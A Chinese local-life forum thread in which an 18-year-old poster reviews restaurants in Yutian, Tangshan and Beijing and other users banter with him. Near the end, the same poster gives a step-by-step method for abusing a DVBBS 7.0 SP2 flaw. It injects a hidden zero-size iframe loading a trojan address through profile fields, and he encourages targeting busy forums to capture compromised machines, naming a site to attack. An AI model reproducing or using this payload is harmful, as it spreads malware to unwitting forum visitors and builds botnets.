玉田生活网

我比较好吃 但不懒做!!!!!

<P>我温饱问题解决了  所以现在吃的也要质量了    玉田的好吃的都干过了  所以随着我欲望的膨胀  我开始像京津唐地区辐射    说说我自己的经历吧</P>
<P>玉田那几家饭店大多都吃过    原因是我老妈老不做饭   没办法只好委屈肚子   其实还是家做的比较好吃   离我最近的就是京鲁川      几乎每天都暴满</P>
<P>生意出奇的好   大多是政府车  我仔细观察过100号以内的    原因是不怕签单  老"版"是财政局的   我最喜欢那夏天的桂花酸酶汤   还有就是鱼了     不过我在那吃了回生鱼就很少去了    其次就是  玉粮了   价钱便宜  大众饭店    很好   没什么特色   如果家人吃   我推荐那   实惠       富坤   原来老和平的地方      装修该换了   因为酒店装修就用二年     我说的是5星级的标准   几乎没什么优势    和平  我很小的时候去过   老板好像是个女的    电视台的   我不知道我的记忆还对不,   那吃海鲜 和海鲜大世界的差不多     不过 我还是喜欢在和平   毕竟海鲜大世界的老板死了   我比较胆小    一去那我就害怕   听说是因为房子风水的关系</P>
<P>还有个涮府   不过现在都养狗了   那是玉田饭店秩序最差的一个   男女服务生竟然当着客人面接吻     真是考验我的定力    那样的酒店不黄才怪呢    还有个王府 在老外贸那    里面是雕梁画栋     真有钱  装修的豪华     听说是谁谁的司机  反正是那些人开的   我怕管删我帖  不多说了   还没去呢就黄了   原因是不和  听我父辈说的   不太懂大人们的事   大亨    公安部门的比较多   原因嘛是比较隐蔽     就去过一次    小门脸   就在黑天鹅夜总会后面   里面可不小   饭菜也很一般   价钱不确定   因为不是我交钱   不过里面服务的MM很漂亮   还有就是豪门荘园   大多是结婚什么的去     地方大   现在又有玉田宾馆给它阔融了   形成了一条完善的产业价值链     就是离着  晶源烦了点    没有多大绿化面积   没有好的市内游泳池   什么保领球馆也老化了     而且挑费也大   需要整改    桃园不错的名字   就是门口环境太差    路太破   不过里面还行  有足够大的停车厂     房间里面也不错   挂了很多名人字画   不知道真的假的    饭也不贵    而且那有大房间  家庭聚会首选    然后就是三星了   汽车站那的饭店很少去   不过我以前从不吃玉米面的饼   但是三星做的非常好   玉米饼和虾酱搭配   非常香   现在还回味</P>
<P>红灯笼   哈哈   烤鸭做的不错  也实惠   吃完还能弄个全鸭汤   不过鱼就做的差劲了   红食用色素好像放的太多实事 我以前吃过一次   不知道现在还是不是</P>
<P>宏德  燕郊   肥牛    这些都是后起之绣       不知道能不能像京鲁川   和平那么长久  .宏宇 酒店在气车站对面  地方不太好  角楼  不过舞池不错   在就是老板她女儿有吸引力  不知道谁要当金龟婿了!!!     汝南   也在角楼的地方   这些地方开饭店都不怎样    我觉得是    不过同学聚会选在那不错  我也不知道为什么选那反正我们同学聚会一般都在那   价钱还可以   我喜欢的冷面 玉田没有  蓟县有   很不错的韩国饭店  切记里面服务生可是朝鲜MM   哦!!哈哈</P>
<P>就在汽车站那   冷面拌饭    看&lt;&lt;大长今&gt;&gt;发烧的能去了  说几个好的外卖吧   就在玉田的狮子桥那  家里有考生的注意了  在道东面剪子街附近有一个卖熟食物中的  在那能买到猪脑   很便宜的   哈哈!!不过要早去 &lt;4点以前就去  &gt;要不都叫我买了吃了   大家常吃的烧饼二郎庙那有一份做的很好  不过具体情况不太了解  大厦里面有迸玉米花的  巧克力味的   就是没天津做的好   也能凑活着吃      唐山是个高消费又不  实惠的地方   在那吃饭很少   不过要什么有什么   澳洲龙虾   鲍鱼  极品燕窝    </P>
<P>哈哈都没吃过   就在那的泰国特色餐厅吃过一次   咖哩饭   狂晕   拿咱们用的香料做调味品  吃的我想吐    以后就很少去了   毕竟我生活在玉田   还有就是  不开上宝马X5以上的车你别去   丢人   那门口最差的还是X5系列   其他都是什么小跑   两坐的   MM也不少   LV的手提包   真TM的有钱    我最喜欢的还是  北京</P>
<P>那是让我魂飞破散的地方    吃的也真TM的多   什么小肠陈   暴肚冯 驴打滚  恩园居炒咯嘚    塌锅李  等等等 这是老北京的  让我吃了个便了 在那还能吃到全国各地   天津的特产 狗不理    桂发祥  麻花  还有什么麻辣汤   猫耳朵   小笼包子  酸辣粉条  太多了   我就背个包   就在前门那一大群胡同里转   老北京又叫大栅栏   累了就去张一元那买50克&lt;就是一两&gt;茶叶 &lt;别要最好的  那可多少钱的都有100RMB/斤就很不错了 上回就吃亏了&gt;  去二楼叫人给你泡上  歇会   还要小心  那茶具  弄坏了赔不起 </P>
<P>转完这些恐怕要3 .4天   还要有熟人带着   然后就拔营去  东单西单   王府井   小吃一条街      放开你肚子随便干吧  也不算太贵   我记得我吃羊肉串  10RMB一个   吃了一个  你就什么羊肉你都别吃了   肥  !!! 顺着腻的理由还能弄块哈密瓜吃   我的一惯作风  哈哈  注意:哈密瓜是白送的   嘎嘎   &lt;都是新疆的&gt;还有很多地方  天桥   不知道现在还有吗??</P>
<P>琉璃厂的大碗茶   有免费的果脯吃   还能随便滔点古董  别指望发才    牛街   那都是回族   别提猪   那的羊蝎子不错  </P>
<P>那还有坦博的清明家具展   靠!!全是紫檀木的    唐山的有钱和北京没法比呀!!!   唐山的都是土老冒   暴发户形式的 </P>
<P>累了   不写了  明天在写吧      有错字的地方帮忙找下  呵呵!!   我比较马虎!!<br></P>[em08][em08]

<P>没制了   我还是找扫描仪去吧   照片能说明一切   </P>
<P>大家注意了,楼主才18岁,我们小心点拍砖吧,必定他还小,好多事情还没有经历,我们帮他盖楼,不拍砖了.</P>
<P>但我要提醒楼主,你才18岁,正是学习的好时候,多学些东西,包括一些基本的生活常识,对你有好处.</P>
<P>希望尽快看到你的"做"篇文章!</P>
<P>我就不明白谁不喜欢吃!!!</P>
<P>不过,楼主,就算吃得再好,有空的话还是让老妈煮锅粥,来点老咸菜吧,那味才够地儿道。妈妈用大锅一块起的鲫鱼玉米饼,老爸用沙锅做的清水鱼白菜和萝卜牛肉,那烙出香味闻着就馋的发面大糖饼,等等等等,那也太多了,要我嘴里,这些远比那些山珍海味美!现在我肚里的馋虫已经不老实了。还是那句话,我爱妈妈!我爱老爸!</P>
<P>楼主,您也不能只写吃,不写怎么个不懒做啊!总不能以转几天吃个够就说自己不懒吧!别反问我,我声明:我懒!</P>
<P>我说了   还没写完呢   郁闷     还有  我的做不是做饭的做    我从不洗衣服   做饭   收拾房间   我觉得那是女人做的  我老妈也不叫我做  习惯了</P>

<P>楼主你站好了啊,就在那儿等着大家拍砖吧,砖多了也能盖起楼来。</P>
<P>首先我还知道如何解释“好吃懒做”,您就别歪想了啊!</P>
<P>其次你想歪了就想歪了吧,还在那大言不惭的说什么男人做的女人做的干嘛?你有好母亲,你能找到好老婆,我们全体论坛朋友为你祝福,我们还可以羡慕你,但您也是不是应低调点啊?人家冯巩不是说了嘛“没事找个合适的地儿偷着乐去”!</P>
<P>最后,拜托您也学会些风趣好吗?我那意思不就是告诉您,我等着看您那如何不懒做呢吗!</P>
<P>   天.楼主可谓是一大吃圣~~~~玉田的酒店餐馆饮食文化被你一一点得俱全拉.</P>
<P>  让人哈拉子流了一地...</P>
<P>  麦子说是要上砖头.恐怕楼主见到砖头摆上桌子也要啃上两口.这牙口吃嘛嘛香.</P>
<P>  哈哈.女人做事的问题就不用说了...楼主也只能在这儿咕噜几句.到家里定是围裙上身了.</P>
<P>  说说文章.除去标点均无.还算是可喜可佳.过年了嘛.大家也都要好好吃几口了.</P>[em03][em03][em03][em03][em03][em04][em04]
<P>还是钦差读得懂我的所谓"幽默",麦子谢了!</P>
<P>事实上我没挑楼主文章的毛病,是看他写的投入,所以才跟着写嘛,可是他偏理解不对头,我也没办法,我说要上砖头,是因为他分男女性别分得太清,这全什么年月了啊!在金堆里长大的人,也不能这样啊,吃是多么重要的事情,要是连开水都不会烧,可就更麻烦了!</P>
<P>我们的女同胞在那啊!来了肯定是要拍一下的吧!</P>
[em03][em03][em03][em03][em03][em03][em03][em03][em03][em03]
我先拍你一砖,只顾自己吃,多没意思,下次记着叫上哥哥[em03][em01]
很抱歉  我才18  老婆没有   我爷爷是老北京  所以吃过很多北京的小吃   我爷爷常带我去   玉田呢  我姥姥家   家庭聚会的时候都在  饭店     我会把照片贴上的 因为我们每次聚会都有照片  我的父母都是做生意的   所以饭局比较勤   其次就是我比较独立   爱到处走走  有些人就是多事   乱猜别人隐私可不是什么好行为    还有   我不会   误解好吃懒做   也懂得什么叫三十而立   天冷了不愿意出去了   所以闲着没事在家发贴赚声望玩     爱怎么评价就怎么评价吧  反正我要盖楼了     哦   还有就怕你看见的时候舍不得拍   要拍的话没别拍脸   拍屁股   要不我怎么见人啊!!!!

<FONT size=5>我看楼主闲着没事儿发贴可比赵本山闲着没事卖媳妇儿玩好多了,毕竟不用又拐又卖的,而且还要上大街,天儿,真冷!过年了送你一块砖,拍在哪你就掂量着办吧,可别拍屁股上,那可有拍马屁的嫌疑.[em03][em03]</FONT>
<P>晕了   好不容易写了篇文章   还给我删了  我就贴这吧  </P>
<P>呵呵  马上就要过年了  闲的我没事  玩会动网入侵     今年动网爆出一个挂马漏洞  嘿嘿   用户无须管理员权限  就可以在论坛页面嵌入木马  攻击其他用户    </P>
<P>拿一个普通动网DVBBS 7.0 SP2论坛为例子  &lt;记住要找访问量大的 机会多 也比较适合挂马捉肉鸡  &gt;  前提是先注册   这个就不用我详细说了吧</P>
<P>然后登陆 点击控制面版   然后是联系资料修改   到了个人资料修改   在主页那添上一段代码(&lt;Script&gt;&lt;IFRAMEheight=0SRC="http://你的网页木马地址"></IFRAME&gt;)   这一段代码表示建立一个长度和宽度都为零的网页框架  在网页框架中会打开填写的网页木马地址   然后是在MSN中填写以下代码(</P>
<P><Sciript Language=javaScript&gt;var actioninfo3='单帖屏蔽')完事之后点更新  之后就是系统提示您的新资料提交成功 然后是是发新帖 在你新帖中你的网页木马已经开始工作了(我建议你们弄点挑逗的话题  增加访问量 )  如果是隐藏的方式打开网页木马 查看帖子的用户就一定中标了  嘎嘎  自己慢慢试吧   肉鸡多了可别忘了分我几只 </P>
<P><br>给你们推荐个访问量大的  <a href="http://www.cng.com.cn.bbs/index.asp" target="_blank" >www.cng.com.cn.bbs/index.asp</A></P>
<P>                                                                                                            圈&amp;</P>

我真要拍你一砖了,你太吓人了[em08]
[em02][em02][em02][em03][em03][em03]